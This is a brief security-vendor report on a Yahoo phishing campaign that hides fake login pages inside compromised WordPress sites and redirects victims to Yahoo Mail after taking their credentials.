Yahoo phishing hides in compromised WordPress websites

Yahoo users have been targeted in a phishing attack that starts with an “avoid account deactivation” email. Mousing over the link shows the non-Yahoo link – an easy way to know that something is amiss.

 

The phishing pages are very authentic looking. Once users have entered their login details (which are collected by the phisher), they are redirected to Yahoo Mail. 

 

A large number of compromised sites have been used to hide the phishing pages – all the samples collected by Commtouch Labs were based on WordPress. In such cases the phishers seek out a particular plugin with a known vulnerability that can be repeatedly exploited on many sites. In the example below a Romanian photographer’s website continues to function normally while the phishing page is hidden in the blog section.